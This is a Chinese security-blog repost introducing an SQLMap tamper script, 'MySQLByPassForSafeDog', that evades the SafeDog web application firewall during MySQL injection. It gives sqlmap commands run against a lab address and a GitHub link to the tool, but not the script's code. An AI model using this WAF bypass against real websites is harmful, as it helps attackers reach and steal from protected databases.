MySQL注入绕安全狗脚本 -- MySQLByPassForSafeDog

admin
admin
admin
101960
文章
87
评论
2023年2月28日15:17:56评论33 views字数 673阅读2分14秒阅读模式

0x01 工具介绍


此Tamper仅仅适用于MySQL数据库,在SQLMap使用过程中添加参数--tamper=MySQLByPassForSafeDog。


0x02 安装与使用


1、装网站安全狗Apache最新版

MySQL注入绕安全狗脚本 -- MySQLByPassForSafeDog

2、启用安全狗,不加MySQLByPassForSafeDog绕狗Tamper:

python sqlmap.py -u "http://192.168.2.3:60001/sqli.php?id=1" --random-agent --dbms=mysql

MySQL注入绕安全狗脚本 -- MySQLByPassForSafeDog

3、启用安全狗,添加MySQLByPassForSafeDog绕狗Tamper:

python sqlmap.py -u "http://192.168.2.3:60001/sqli.php?id=1" --random-agent --dbms=mysql --tamper=MySQLByPassForSafeDog

MySQL注入绕安全狗脚本 -- MySQLByPassForSafeDog

4、绕过POC

可以添加参数-v 3进行学习查看

python sqlmap.py -u "http://192.168.2.3:60001/sqli.php?id=1" --random-agent --dbms=mysql --tamper=MySQLByPassForSafeDog -v 3

MySQL注入绕安全狗脚本 -- MySQLByPassForSafeDog


0x03 下载地址


项目地址:https://github.com/Tas9er/MySQLByPassForSafeDog


注:如有侵权请联系删除

MySQL注入绕安全狗脚本 -- MySQLByPassForSafeDog

   学习更多技术,关注我:   

觉得文章不错给点个‘再看’吧。

原文始发于微信公众号(编码安全研究):MySQL注入绕安全狗脚本 -- MySQLByPassForSafeDog

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月28日15:17:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   MySQL注入绕安全狗脚本 -- MySQLByPassForSafeDoghttp://cn-sec.com/archives/1579323.html

发表评论

匿名网友 填写信息